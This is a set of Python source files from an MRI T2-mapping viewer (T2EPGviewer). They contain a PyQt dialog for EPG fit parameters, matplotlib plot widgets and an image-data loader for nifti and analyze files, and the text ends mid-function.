self.gridLayout.addWidget(self.fatFractionMin, 4, 2, 1, 1) self.fatFractionMax = QtWidgets.QLineEdit(self.widget) self.fatFractionMax.setValidator(QtGui.QDoubleValidator()) self.fatFractionMax.setObjectName("fatFractionMax") self.gridLayout.addWidget(self.fatFractionMax, 4, 3, 1, 1) self.b1scaleMax = QtWidgets.QLineEdit(self.widget) self.b1scaleMax.setValidator(QtGui.QDoubleValidator()) self.b1scaleMax.setObjectName("b1scaleMax") self.gridLayout.addWidget(self.b1scaleMax, 5, 3, 1, 1) self.muscleFractionMin = QtWidgets.QLineEdit(self.widget) self.muscleFractionMin.setValidator(QtGui.QDoubleValidator()) self.muscleFractionMin.setObjectName("muscleFractionMin") self.gridLayout.addWidget(self.muscleFractionMin, 3, 2, 1, 1) self.b1scaleValue = QtWidgets.QLineEdit(self.widget) self.b1scaleValue.setValidator(QtGui.QDoubleValidator()) self.b1scaleValue.setObjectName("b1scaleValue") self.gridLayout.addWidget(self.b1scaleValue, 5, 1, 1, 1) self.b1scaleMin = QtWidgets.QLineEdit(self.widget) self.b1scaleMin.setValidator(QtGui.QDoubleValidator()) self.b1scaleMin.setObjectName("b1scaleMin") self.gridLayout.addWidget(self.b1scaleMin, 5, 2, 1, 1) self.fatFractionLabel = QtWidgets.QLabel(self.widget) self.fatFractionLabel.setObjectName("fatFractionLabel") self.gridLayout.addWidget(self.fatFractionLabel, 4, 0, 1, 1) self.fatFractionValue = QtWidgets.QLineEdit(self.widget) self.fatFractionValue.setValidator(QtGui.QDoubleValidator()) self.fatFractionValue.setObjectName("fatFractionValue") self.gridLayout.addWidget(self.fatFractionValue, 4, 1, 1, 1) self.muscleT1label = QtWidgets.QLabel(self.widget) self.muscleT1label.setObjectName("muscleT1label") self.gridLayout.addWidget(self.muscleT1label, 6, 0, 1, 1) self.fatT2min = QtWidgets.QLineEdit(self.widget) self.fatT2min.setValidator(QtGui.QDoubleValidator()) self.fatT2min.setObjectName("fatT2min") self.gridLayout.addWidget(self.fatT2min, 2, 2, 1, 1) self.maxHeadingLabel = QtWidgets.QLabel(self.widget) 
self.maxHeadingLabel.setObjectName("maxHeadingLabel") self.gridLayout.addWidget(self.maxHeadingLabel, 0, 3, 1, 1) self.minHeadingLabel = QtWidgets.QLabel(self.widget) self.minHeadingLabel.setObjectName("minHeadingLabel") self.gridLayout.addWidget(self.minHeadingLabel, 0, 2, 1, 1) self.valueHeadingLabel = QtWidgets.QLabel(self.widget) self.valueHeadingLabel.setObjectName("valueHeadingLabel") self.gridLayout.addWidget(self.valueHeadingLabel, 0, 1, 1, 1) self.fatT2value = QtWidgets.QLineEdit(self.widget) self.fatT2value.setValidator(QtGui.QDoubleValidator()) self.fatT2value.setObjectName("fatT2value") self.gridLayout.addWidget(self.fatT2value, 2, 1, 1, 1) self.optimizeFatT2 = QtWidgets.QCheckBox(self.widget) self.optimizeFatT2.setText("") self.optimizeFatT2.setChecked(False) self.optimizeFatT2.setObjectName("optimizeFatT2") self.gridLayout.addWidget(self.optimizeFatT2, 2, 4, 1, 1) self.muscleT2value = QtWidgets.QLineEdit(self.widget) self.muscleT2value.setInputMethodHints(QtCore.Qt.ImhDigitsOnly|QtCore.Qt.ImhFormattedNumbersOnly) self.muscleT2value.setProperty("muscleValue", 0.0) self.muscleT2value.setProperty("number", 35.0) self.muscleT2value.setObjectName("muscleT2value") self.gridLayout.addWidget(self.muscleT2value, 1, 1, 1, 1) self.fatT2label = QtWidgets.QLabel(self.widget) self.fatT2label.setObjectName("fatT2label") self.gridLayout.addWidget(self.fatT2label, 2, 0, 1, 1) self.fatT2max = QtWidgets.QLineEdit(self.widget) self.fatT2max.setValidator(QtGui.QDoubleValidator()) self.fatT2max.setObjectName("fatT2max") self.gridLayout.addWidget(self.fatT2max, 2, 3, 1, 1) self.muscleT2max = QtWidgets.QLineEdit(self.widget) self.muscleT2max.setValidator(QtGui.QDoubleValidator()) self.muscleT2max.setObjectName("muscleT2max") self.gridLayout.addWidget(self.muscleT2max, 1, 3, 1, 1) self.opimizedHeadingLabel = QtWidgets.QLabel(self.widget) self.opimizedHeadingLabel.setObjectName("opimizedHeadingLabel") self.gridLayout.addWidget(self.opimizedHeadingLabel, 0, 4, 1, 1) 
self.muscleT2label = QtWidgets.QLabel(self.widget) self.muscleT2label.setObjectName("muscleT2label") self.gridLayout.addWidget(self.muscleT2label, 1, 0, 1, 1) self.muscleT2min = QtWidgets.QLineEdit(self.widget) self.muscleT2min.setInputMethodHints(QtCore.Qt.ImhFormattedNumbersOnly) self.muscleT2min.setObjectName("muscleT2min") self.gridLayout.addWidget(self.muscleT2min, 1, 2, 1, 1) self.optimizeMuscleT2 = QtWidgets.QCheckBox(self.widget) self.optimizeMuscleT2.setText("") self.optimizeMuscleT2.setChecked(True) self.optimizeMuscleT2.setObjectName("optimizeMuscleT2") self.gridLayout.addWidget(self.optimizeMuscleT2, 1, 4, 1, 1) self.optimizeB1scale = QtWidgets.QCheckBox(self.widget) self.optimizeB1scale.setText("") self.optimizeB1scale.setChecked(True) self.optimizeB1scale.setObjectName("optimizeB1scale") self.gridLayout.addWidget(self.optimizeB1scale, 5, 4, 1, 1) self.optimizeFatFraction = QtWidgets.QCheckBox(self.widget) self.optimizeFatFraction.setText("") self.optimizeFatFraction.setChecked(True) self.optimizeFatFraction.setObjectName("optimizeFatFraction") self.gridLayout.addWidget(self.optimizeFatFraction, 4, 4, 1, 1) self.b1scaleLabel = QtWidgets.QLabel(self.widget) self.b1scaleLabel.setObjectName("b1scaleLabel") self.gridLayout.addWidget(self.b1scaleLabel, 5, 0, 1, 1) self.muscleT1value = QtWidgets.QLineEdit(self.widget) self.muscleT1value.setObjectName("muscleT1value") self.gridLayout.addWidget(self.muscleT1value, 6, 1, 1, 1) self.T2echoValue = QtWidgets.QLineEdit(self.widget) self.T2echoValue.setValidator(QtGui.QDoubleValidator()) self.T2echoValue.setObjectName("T2echoValue") self.gridLayout.addWidget(self.T2echoValue, 8, 1, 1, 1) self.muscleFractionValue = QtWidgets.QLineEdit(self.widget) self.muscleFractionValue.setValidator(QtGui.QDoubleValidator()) self.muscleFractionValue.setObjectName("muscleFractionValue") self.gridLayout.addWidget(self.muscleFractionValue, 3, 1, 1, 1) self.muscleFractionLabel = QtWidgets.QLabel(self.widget) 
self.muscleFractionLabel.setObjectName("muscleFractionLabel") self.gridLayout.addWidget(self.muscleFractionLabel, 3, 0, 1, 1) self.label = QtWidgets.QLabel(self.widget) self.label.setObjectName("label") self.gridLayout.addWidget(self.label, 8, 0, 1, 1) self.fatT1label = QtWidgets.QLabel(self.widget) self.fatT1label.setObjectName("fatT1label") self.gridLayout.addWidget(self.fatT1label, 7, 0, 1, 1) self.retranslateUi(Dialog) self.buttonBox.accepted.connect(self.dialog_ok_clicked) self.buttonBox.rejected.connect(Dialog.reject) QtCore.QMetaObject.connectSlotsByName(Dialog) def retranslateUi(self, Dialog): _translate = QtCore.QCoreApplication.translate Dialog.setWindowTitle(_translate("Dialog", "EPG")) self.fatT1value.setText(_translate("Dialog", "1450")) self.muscleFractionMax.setText(_translate("Dialog", "10")) self.fatFractionMin.setText(_translate("Dialog", "0")) self.fatFractionMax.setText(_translate("Dialog", "10")) self.b1scaleMax.setText(_translate("Dialog", "2")) self.muscleFractionMin.setText(_translate("Dialog", "0")) self.b1scaleValue.setText(_translate("Dialog", "1")) self.b1scaleMin.setText(_translate("Dialog", "0")) self.fatFractionLabel.setText(_translate("Dialog", "Fat Fraction")) self.fatFractionValue.setText(_translate("Dialog", ".3")) self.muscleT1label.setText(_translate("Dialog", "<html><head/><body><p>Muscle T<span style=\" vertical-align:sub;\">1</span> (ms)</p></body></html>")) self.fatT2min.setText(_translate("Dialog", "0")) self.maxHeadingLabel.setText(_translate("Dialog", "maximum")) self.minHeadingLabel.setText(_translate("Dialog", "minimum")) self.valueHeadingLabel.setText(_translate("Dialog", "value")) self.fatT2value.setText(_translate("Dialog", "200")) self.muscleT2value.setText(_translate("Dialog", "35")) self.fatT2label.setText(_translate("Dialog", "<html><head/><body><p>Fat T<span style=\" vertical-align:sub;\">2</span> (ms)</p></body></html>")) self.fatT2max.setText(_translate("Dialog", "2000")) 
self.muscleT2max.setText(_translate("Dialog", "150")) self.opimizedHeadingLabel.setText(_translate("Dialog", "optimized")) self.muscleT2label.setText(_translate("Dialog", "<html><head/><body><p>Muscle T<span style=\" vertical-align:sub;\">2</span> (ms)</p></body></html>")) self.muscleT2min.setText(_translate("Dialog", "0")) self.b1scaleLabel.setText(_translate("Dialog", "B<sub>1</sub> scale")) self.muscleT1value.setText(_translate("Dialog", "500")) self.T2echoValue.setText(_translate("Dialog", "10")) self.muscleFractionValue.setText(_translate("Dialog", "0.7")) self.muscleFractionLabel.setText(_translate("Dialog", "Muscle Fraction")) self.label.setText(_translate("Dialog", "<html><head/><body><p>T<span style=\" vertical-align:sub;\">2</span> Echo (ms)</p></body></html>")) self.fatT1label.setText(_translate("Dialog", "<html><head/><body><p>Fat T<span style=\" vertical-align:sub;\">1</span> (ms)</p></body></html>")) def dialog_ok_clicked(self): print("dialog_ok_clicked") self.Dialog.setResult(1) worked =self.get_fitparameters() if worked: self.params.pretty_print() self.Dialog.accept() def get_fitparameters( self ): print("self.optimizeFatFraction.isChecked()", self.optimizeFatFraction.isChecked() ) #epgt2fitparams = lm.Parameters() worked = True try: self.params.add(name='T2muscle', value = float(self.muscleT2value.text()), min = float(self.muscleT2min.text()), max = float(self.muscleT2max.text()), vary = self.optimizeMuscleT2.isChecked()) self.params.add(name='T2fat', value = float(self.fatT2value.text()), min = float(self.fatT2min.text()), max = float(self.fatT2max.text()), vary = self.optimizeFatT2.isChecked()) self.params.add(name='Amuscle', value = float(self.muscleFractionValue.text()), min = float(self.muscleFractionMin.text()), max = float(self.muscleFractionMax.text()), vary = self.optimizeMuscleFraction.isChecked()) self.params.add(name='Afat', value = float(self.fatFractionValue.text()), min = float(self.fatFractionMin.text()), max = 
float(self.fatFractionMax.text()), vary = self.optimizeFatFraction.isChecked()) self.params.add(name='B1scale', value = float(self.b1scaleValue.text()), min = float(self.b1scaleMin.text()), max = float(self.b1scaleMax.text()), vary = self.optimizeB1scale.isChecked()) self.params.add(name='T1muscle', value = float(self.muscleT1value.text()), vary = False) self.params.add(name='T1fat', value = float(self.fatT1value.text()), vary = False) self.params.add(name='echo', value = float(self.T2echoValue.text()), vary = False) buttonsChecked = [not self.optimizeFatFraction.isChecked(), not self.optimizeMuscleFraction.isChecked(), not self.optimizeMuscleT2.isChecked(), not self.optimizeFatT2.isChecked(), not self.optimizeB1scale.isChecked()] print(buttonsChecked) if all(buttonsChecked): worked=False self.lmparams['epgt2fitparams'] = self.params except: worked = False return worked if __name__ == "__main__": import sys app = QtWidgets.QApplication(sys.argv) Dialog = QtWidgets.QDialog() Dialog.setModal(False) lmparams = {} epgt2fitparams = lm.Parameters() epgt2fitparams.add('T2fat', value = 180.0, min=0, max=5000, vary=False) epgt2fitparams.add('T2muscle', value = 35, min=0, max=100, vary=True ) epgt2fitparams.add('Afat', value = 0.01, min=0, max=10, vary=True ) epgt2fitparams.add('Amuscle', value = 0.1, min=0, max=10, vary=True ) epgt2fitparams.add('T1fat', value = 365.0, vary=False) epgt2fitparams.add('T1muscle', value = 1400, vary=False) epgt2fitparams.add('echo', value = 10.0, vary=False) epgt2fitparams.add('B1scale', value = 1.0, min=0, max=2, vary=True) lmparams['epgt2fitparams']=epgt2fitparams ui = EpgT2paramsDialog(lmparams) ui.setupEpgT2paramsDialog(Dialog) rt=Dialog.open() print("Dialog.result() =",Dialog.result()) #print( "get_fitparameters(ui).items()", ui.get_fitparameters().items()) sys.exit(app.exec_())
Python
346
47.427746
158
/epgT2paramsDialog.py
0.631373
0.606525
EricHughesABC/T2EPGviewer
refs/heads/master
# -*- coding: utf-8 -*- """ Created on Wed Apr 17 14:34:43 2019 @author: neh69 """ import numpy as np import matplotlib from matplotlib import pyplot as plt #import seaborn as sns from matplotlib.backends.qt_compat import QtCore, QtWidgets, is_pyqt5 #import seaborn as sns if is_pyqt5(): print("pyqt5") from matplotlib.backends.backend_qt5agg import ( FigureCanvas, NavigationToolbar2QT as NavigationToolbar) else: print("pyqt4") from matplotlib.backends.backend_qt4agg import ( FigureCanvas, NavigationToolbar2QT as NavigationToolbar) #from matplotlib.figure import Figure import mplcursors #from ImageData import T2imageData parameterNames ={'T2m': [ 'T$_{2m}$ [ms]','{}, T$_{{2m}}$ = {:.1f} [ms]' ], 'Am100': [ 'A$_{m}$ [%]', '{}, A$_{{m}}$ = {:.1f} [%]' ], 'Af100': [ 'A$_{f}$ [%]', '{}, A$_{{f}}$ = {:.1f} [%]'], 'B1': [ 'B$_{1}$ [-]', '{}, B$_{{1}}$ = {:.1f} [-]'], 'fatPC': [ 'fat [%]', '{}, fat = {:.1f} [%]'] } class MRIPlotWidget(QtWidgets.QWidget): #class PlotWidget(QtWidgets.QWidget): def __init__(self, parent=None, showToolbar=True, imageData=None): super().__init__(parent) self.fig, self.ax = plt.subplots() # fig =Figure(figsize=(3, 5)) self.fig.set_tight_layout(True) self.plot_canvas = FigureCanvas(self.fig) # self.ax = self.fig.add_subplot(111) # mplcursors.cursor(fig,hover=True) self.layout = QtWidgets.QVBoxLayout(self) # def __init__( self, parent=None, showToolbar=True, imageData=None): self.axesList = [] self.imageData = imageData sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed) self.toggleImage = QtWidgets.QRadioButton("Hide background Image") self.toggleImage.toggled.connect(lambda: self.toggleImageChanged(self.toggleImage)) self.toggleImage.isChecked() self.layout.addWidget(self.toggleImage) self.toggleImage.setSizePolicy(sizePolicy) self.sliceLabel = QtWidgets.QLabel("slices") self.layout.addWidget(self.sliceLabel) self.sliceLabel.setSizePolicy(sizePolicy) self.slicesSlider = 
QtWidgets.QSlider(QtCore.Qt.Horizontal) self.slicesSlider.setMinimum(0) self.slicesSlider.setMaximum(4) self.slicesSlider.setValue(0) self.slicesSlider.setTickPosition(QtWidgets.QSlider.TicksBelow) self.slicesSlider.setTickInterval(1) self.slicesSlider.valueChanged.connect(self.valuechangedSlider) self.slicesSlider.setSizePolicy(QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Fixed)) self.layout.addWidget(self.slicesSlider) self.echoesLabel = QtWidgets.QLabel("echoes") self.echoesLabel.setSizePolicy(sizePolicy) self.layout.addWidget(self.echoesLabel) self.echoesSlider = QtWidgets.QSlider(QtCore.Qt.Horizontal) self.echoesSlider.setMinimum(0) self.echoesSlider.setMaximum(16) self.echoesSlider.setValue(0) self.echoesSlider.setTickPosition(QtWidgets.QSlider.TicksBelow) self.echoesSlider.setTickInterval(1) self.echoesSlider.valueChanged.connect(self.valuechangedSlider) self.echoesSlider.setSizePolicy(QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Fixed)) self.layout.addWidget(self.echoesSlider) self.layout.addWidget(self.plot_canvas) if showToolbar: self.toolbar = NavigationToolbar(self.plot_canvas, self) self.layout.addWidget(self.toolbar) self.setSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding) self.updateGeometry() self.plot_canvas.mpl_connect('button_press_event', self.onclick) # self.plot_canvas.mpl_connect("motion_notify_event", self.onhover) self.ax.imshow(matplotlib.image.imread('vision.png')[:,:,0]) # self.canvas.figure.axes # self.mpl_cursor = mplcursors.cursor(self.plot_canvas.figure.axes,hover=True) self.ax.grid(False) def valuechangedSlider(self): slice_ = self.slicesSlider.value() echo = self.echoesSlider.value() self.imageData.currentSlice = slice_ self.imageData.currentEcho = echo print("slicesSlider Value =", slice_, "echoesSlider Value =", echo ) if isinstance(self.imageData.ImageDataT2, np.ndarray): print("updating image slice") if self.toggleImage.isChecked(): 
self.imageData.mriSliceIMG *= 0.0 else: self.imageData.mriSiceIMG=self.imageData.ImageDataT2[:,:,slice_,echo].copy() self.imageData.overlayRoisOnImage(slice_+1, self.imageData.fittingParam) self.update_plot(self.imageData.mriSiceIMG, self.imageData.maskedROIs.reshape(self.imageData.mriSiceIMG.shape)) self.histPlotWidget.update_plot([slice_+1,self.imageData.T2slices,self.imageData.dixonSlices], [self.imageData.t2_data_summary_df,self.imageData.dixon_data_summary_df], self.imageData.fittingParam) self.barPlotWidget.update_plot([slice_+1,self.imageData.T2slices,self.imageData.dixonSlices], [self.imageData.t2_data_summary_df,self.imageData.dixon_data_summary_df], self.imageData.fittingParam) else: print("No images to update") def on_fittingParams_rbtn_toggled(self, fittingParam): # rb = self.fittingParams_rbtn.sender() print(fittingParam) self.imageData.fittingParam = fittingParam self.valuechangedSlider() def register_PlotWidgets(self, T2PlotWidget, histPlotWidget, barPlotWidget, radioButtonsWidget): self.T2PlotWidget = T2PlotWidget self.histPlotWidget = histPlotWidget self.barPlotWidget = barPlotWidget self.radioButtonsWidget = radioButtonsWidget # def onhover(self,event): # # if event.inaxes: # # xcoord = int(round(event.xdata)) # ycoord = int(round(event.ydata)) # # print('on hover, ', xcoord, ycoord) def onclick(self,event): xcoord = int(round(event.xdata)) ycoord = int(round(event.ydata)) print("MRI Plot window On Click") print('ycoord =', ycoord) print(type(self.imageData.ImageDataT2)) if type(self.imageData.ImageDataT2) != type(None): image_shape = self.imageData.ImageDataT2.shape print(image_shape[0],image_shape[0]-ycoord, ycoord) t2data = self.imageData.ImageDataT2[ycoord,xcoord,int(self.slicesSlider.value()),:] self.T2PlotWidget.update_plot( xcoord, ycoord, t2data) def update_plot(self, img, maskedROIs): self.ax.cla() self.ax.imshow(img,cmap=plt.cm.gray, interpolation='nearest') print("maskedROIs.shape", maskedROIs.shape) print("img.shape", img.shape) 
print("maskedROIs.max()",maskedROIs.max()) if maskedROIs.max() > 0: self.ax.imshow(maskedROIs.reshape(img.shape), cmap=plt.cm.jet, alpha=.5, interpolation='bilinear') mpl_cursor = mplcursors.cursor(self.plot_canvas.figure.axes,hover=True) @mpl_cursor.connect("add") def _(sel): ann = sel.annotation ttt = ann.get_text() xc,yc, zl = [s.split('=') for s in ttt.splitlines()] x = round(float(xc[1])) y = round(float(yc[1])) print("x",x, "y",y) nrows,ncols = img.shape cslice=self.imageData.currentSlice fitParam = self.imageData.fittingParam print("cslice",cslice, "nrows", nrows, "ncols") print("fitParam",fitParam) ### figure out which data set to use slice_df = None if fitParam in self.imageData.t2_data_summary_df.columns: print(fitParam, "T2 dataFrame chosen") data_df = self.imageData.t2_data_summary_df slice_df = data_df[data_df.slice==cslice+1] elif fitParam in self.imageData.dixon_data_summary_df.columns: print(fitParam, "Dixon dataFrame chosen") data_df = self.imageData.dixon_data_summary_df if cslice+1 in self.imageData.T2slices: dixonSliceIndex = self.imageData.dixonSlices[self.imageData.T2slices.index(cslice+1)] slice_df = data_df[data_df.slice==dixonSliceIndex] else: slice_df = data_df[data_df.slice==cslice] ### return current slice # slice_df = data_df[data_df.slice==cslice+1] roiList = [] valueList=[] if not isinstance(slice_df, type(None)): print("type(slice_df)",type(slice_df)) print("slice_df.shape",slice_df.shape) roiList = slice_df[slice_df['pixel_index']==y*ncols+x]['roi'].values valueList = slice_df[slice_df['pixel_index']==y*ncols+x][fitParam].values print("roiList", roiList) print("valueList",valueList) fitParamLabel = parameterNames[fitParam][1] if len(roiList)>0: roi=roiList[0] value=valueList[0] ann.set_text(fitParamLabel.format( roi, value)) else: ann.set_text("x = {:d}\ny = {:d}".format( x, y )) self.ax.grid(False) self.plot_canvas.draw() def toggleImageChanged(self,b1): print("Entered toggleImageChanged") if not 
isinstance(self.imageData.mriSliceIMG, type(None) ): if self.toggleImage.isChecked(): print("Clear background image") self.update_plot(np.zeros((self.imageData.mriSliceIMG.shape)), self.imageData.maskedROIs.reshape((self.imageData.mriSliceIMG.shape))) else: self.valuechangedSlider()
Python
303
33.709572
124
/mriplotwidget.py
0.581578
0.572616
EricHughesABC/T2EPGviewer
refs/heads/master
# -*- coding: utf-8 -*- """ Created on Thu Jul 20 10:29:38 2017 @author: neh69 """ import os import sys import numpy as np import pandas as pd import lmfit as lm import matplotlib import matplotlib.pyplot as plt import seaborn as sns from PyQt5 import QtCore, QtWidgets import visionplot_widgets import mriplotwidget from ImageData import T2imageData def openStudyDir(): dlg = QtWidgets.QFileDialog() returned_data = dlg.getExistingDirectory(None, "Study Directory", "") print("openStudyDir\n",returned_data, type(returned_data)) # tree_window.setRootIndex(tree_window.model.index(returned_data)) def openNiftiAnalyzeFile(): dlg = QtWidgets.QFileDialog() returned_data = dlg.getOpenFileName(None, "MRI data nifti/analyze", procDataDirPath, "nii files (*.nii);;analyze files (*.img);;All files (*)") print(returned_data) def getH5file(): dlg = QtWidgets.QFileDialog() returned_data = dlg.getOpenFileName(None, "select results file", procDataDirPath, "CSV files (*.csv);;All files (*)") pathandfilename = returned_data[0] #self.hd5_store = pd.HDFStore(pathandfilename) if len(pathandfilename) > 0: ### attempt to extract details from data print(pathandfilename) imageData.readin_alldata_from_results_filename( os.path.abspath(pathandfilename)) if imageData.read_T2_img_hdr_files(): print("just before read_T2_data()") if imageData.read_T2_data(): imageData.read_Dixon_data() print("just after read_T2_data()") mainWindow.setWindowTitle(imageData.T2resultsFilenameAndPath) #### Update image displayed in window imageData.overlayRoisOnImage(0, imageData.fittingParam) # mri_window.update_plot(imageData.img1) mri_window.update_plot(imageData.mriSliceIMG, imageData.maskedROIs) print("type(imageData.ImageDataT2)",type(imageData.ImageDataT2)) hist_window.update_plot([1,imageData.T2slices,imageData.dixonSlices], [imageData.t2_data_summary_df, imageData.dixon_data_summary_df], "T2m") bar_window.update_plot([1,imageData.T2slices,imageData.dixonSlices], [imageData.t2_data_summary_df, 
imageData.dixon_data_summary_df], "T2m") #### set min max on sliders mri_window.slicesSlider.setMinimum(0) mri_window.slicesSlider.setMaximum(imageData.numSlicesT2-1) mri_window.slicesSlider.setValue(0) mri_window.echoesSlider.setMinimum(0) mri_window.echoesSlider.setMaximum(imageData.numEchoesT2-1) mri_window.slicesSlider.setValue(0) else: print(imageData.t2_image_hdr_pathfilename, " not found") def fileQuit(self): self.close() def closeEvent(self, ce): self.fileQuit() if __name__ == "__main__": lmparams = {} epgt2fitparams = lm.Parameters() azzt2fitparams = lm.Parameters() epgt2fitparams.add('T2fat', value = 180.0, min=0, max=5000, vary=False) epgt2fitparams.add('T2muscle', value = 35, min=0, max=100, vary=True ) epgt2fitparams.add('Afat', value = 0.20, min=0, max=10, vary=True ) epgt2fitparams.add('Amuscle', value = 0.80, min=0, max=10, vary=True ) epgt2fitparams.add('T1fat', value = 365.0, vary=False) epgt2fitparams.add('T1muscle', value = 1400, vary=False) epgt2fitparams.add('echo', value = 10.0, vary=False) epgt2fitparams.add('B1scale', value = 1.0, min=0, max=2, vary=True ) azzt2fitparams.add_many(('Afat', 60.0, True, 0, 250, None), ('Amuscle', 40.0, True, 0, 250, None), ('T2muscle', 40.0, True, 0, 100, None), ('c_l', 0.55, False, 0, 2000, None), ('c_s', 0.45, False, 0, 2000, None), ('t2_fl', 250.0, False, 0, 2000, None), ('t2_fs', 43.0, False, 0, 2000, None), ('echo', 10.0, False, 0, 2000, None)) lmparams['epgt2fitparams'] = epgt2fitparams lmparams['azzt2fitparams'] = azzt2fitparams params=azzt2fitparams matplotlib.use('Qt5Agg') plt.style.context('seaborn-colorblind') sns.set(font_scale = 0.6) # sns.set_palette("pastel") procDataDirPath = r"/home/eric/Documents/projects/programming/2019/mri_progs/T2EPGviewer/studyData/testStudy/HC-001/sess-1/upperleg/T2/results/muscle/AzzEPG" progname = os.path.basename(sys.argv[0]) qApp = QtWidgets.QApplication(sys.argv) imageData = T2imageData() print("imageData.fittingParam:",imageData.fittingParam) mainWindow = 
QtWidgets.QMainWindow() mainWindow.setAttribute(QtCore.Qt.WA_DeleteOnClose) mainWindow.setWindowTitle("application main window") file_menu = QtWidgets.QMenu('&File', mainWindow) # file_menu.addAction("&Open study Directory", openStudyDir) file_menu.addAction('&Choose Study Results File', getH5file, QtCore.Qt.CTRL + QtCore.Qt.Key_H) # file_menu.addAction('&Open nifti/analyze image File', openNiftiAnalyzeFile ) # file_menu.addAction('&Choose Rois', imageData.getRoiFiles, QtCore.Qt.CTRL + QtCore.Qt.Key_R) # file_menu.addAction('&Quit', fileQuit, QtCore.Qt.CTRL + QtCore.Qt.Key_Q) mainWindow.menuBar().addMenu(file_menu) main_widget = QtWidgets.QWidget(mainWindow) mainlayout = QtWidgets.QHBoxLayout(main_widget) # mainWindow.setCentralWidget(main_widget) # plot_window1 = mri_widget(main_widget) npts = 256*100 iii = np.random.permutation(np.arange(255*255))[:npts] ddd = np.random.randn(npts)*100+500 data_df = pd.DataFrame({'iii': iii, 'ddd':ddd}) leftwindow = QtWidgets.QWidget() rightwindow = QtWidgets.QWidget() splitHwidget = QtWidgets.QSplitter(QtCore.Qt.Horizontal) hlayout = QtWidgets.QHBoxLayout(leftwindow) vlayout = QtWidgets.QVBoxLayout(rightwindow) mri_window = mriplotwidget.MRIPlotWidget( imageData=imageData) rbtns_window = visionplot_widgets.radiobuttons_fitWidget(mri_window=mri_window) t2plot_window = visionplot_widgets.T2PlotWidget( lmparams, showToolbar=False) bar_window = visionplot_widgets.BarPlotWidget( showToolbar=False, data_df=data_df, image_size=256) hist_window = visionplot_widgets.HistogramPlotWidget( mri_plot=mri_window, showToolbar=True,data_df=data_df, image_size=256) mainlayout.addWidget(splitHwidget) hlayout.addWidget(rbtns_window) hlayout.addWidget(mri_window) vlayout.addWidget(t2plot_window) vlayout.addWidget(bar_window) vlayout.addWidget(hist_window) splitHwidget.addWidget(leftwindow) splitHwidget.addWidget(rightwindow ) mri_window.register_PlotWidgets(t2plot_window, bar_window, hist_window, rbtns_window) main_widget.setFocus() 
mainWindow.setCentralWidget(main_widget) mainWindow.show() sys.exit(qApp.exec_())
Python
212
32.594341
161
/simple_pandas_plot.py
0.633006
0.603025
EricHughesABC/T2EPGviewer
refs/heads/master
# -*- coding: utf-8 -*- """ Created on Tue Mar 6 14:55:05 2018 @author: ERIC """ import os import numpy as np import pandas as pd import nibabel class T2imageData(): def __init__(self): self.currentSlice = None self.currentEcho = None self.T2imagesDirpath = None self.dixonImagesDirpath = None self.dixonResultsDirpath = None self.T2resultsDirpath = None self.root = None self.studyName = None self.subject = None self.session = None self.imagedRegion = None self.protocol = None self.results = None self.roiType = None self.fitModel = None self.imagedRegionType = self.roiType self.T2imageType = None self.T2MRIimageFilenameAndPath = "" self.dixonImageType = None self.dixonMRIimageFilenameAndPath = "" self.T2resultsFilenameAndPath = "" self.dixonResultsFilenameAndPath = "" self.fittingParam = "T2m" self.numRowsT2 = None self.numColsT2 = None self.numSlicesT2 = None self.numEchoesT2 = None self.dixonSlices = None self.T2slices = None self.ImageDataT2 = None self.mriSliceIMG = None self.t2_data_summary_df = None self.dixon_data_summary_df = None def readin_alldata_from_results_filename(self, fn): print("inside readin_alldata_from_results_filename") self.set_dataDir_and_results_filenames(fn) self.set_T2imageData_filename_and_type() self.set_dixonImageData_filename_and_type() print("T2resultsDirpath :: ",self.T2resultsDirpath) print("dixonResultsDirpath :: ", self.dixonResultsDirpath) print("T2imagesDirpath :: ", self.T2imagesDirpath) print("dixonImagesDirpath :: ", self.dixonImagesDirpath) print("T2imageType :: ", self.T2imageType) print("T2MRIimageFilenameAndPath :: ", self.T2MRIimageFilenameAndPath) print("dixonImageType :: ", self.dixonImageType) print("dixonMRIimageFilenameAndPath ::", self.dixonMRIimageFilenameAndPath) print("T2resultsFilenameAndPath :: ", self.T2resultsFilenameAndPath) print("dixonResultsFilenameAndPath :: ", self.dixonResultsFilenameAndPath) def set_T2imageData_filename_and_type(self): """Searches for image data in directory can be nifti or analyze 
sets the type and filename""" print("inside set_T2imageData_filename_and_type") print("self.T2imagesDirpath", self.T2imagesDirpath) if self.T2imagesDirpath == None: self.T2imageType = None return False else: imgFilenameList = [ os.path.join(self.T2imagesDirpath,fn) for fn in os.listdir(self.T2imagesDirpath) if "nii" in fn or "img" in fn] if len(imgFilenameList) == 0: self.T2imageType = None self.T2MRIimageFilenameAndPath = None return False else: self.T2MRIimageFilenameAndPath = imgFilenameList[0] if "nii" in self.T2MRIimageFilenameAndPath: self.T2imageType = "nifti" else: self.T2imageType = "analyze" return True def set_dixonImageData_filename_and_type(self): """Searches for image data in directory can be nifti or analyze sets the type and filename filename must have fatPC. in it""" print( "inside set_dixonImageData_filename_and_type") print("self.dixonImagesDirpath",self.dixonImagesDirpath) if self.dixonImagesDirpath == None: self.dionImageType = None return False else: imgFilenameList = [ os.path.join(self.dixonImagesDirpath,fn) for fn in os.listdir(self.dixonImagesDirpath) if "fatPC." 
in fn and ("nii" in fn or "img" in fn)] if len(imgFilenameList) == 0: self.dixonImageType = None self.dixonMRIimageFilenameAndPath = None return False else: self.dixonMRIimageFilenameAndPath = imgFilenameList[0] if "nii" in self.dixonMRIimageFilenameAndPath: self.dixonImageType = "nifti" else: self.dixonImageType = "analyze" return True def set_results_dir(self,protocol, resultsDir): resultsDirpath = None # resultsDirpath1 = resultsDir dirpath = os.path.join(self.root,self.studyName,self.subject,self.session, self.imagedRegion,protocol, self.results,self.roiType,self.fitModel) if os.path.exists(dirpath): resultsDirpath = dirpath else: dirpath = os.path.join(self.root,self.studyName,self.subject,self.session, self.imagedRegion,protocol, self.results,self.roiType) if os.path.exists(dirpath): fitModels = [f for f in os.listdir(dirpath)] if len(fitModels)> 0: resultsDirpath = os.path.join(dirpath, fitModels[0]) return resultsDir, resultsDirpath def set_dataDir_and_results_filenames( self, fn): print("inside set_dataDir_and_results_filenames") print("fn", fn) resultsDir, resultsFilename = 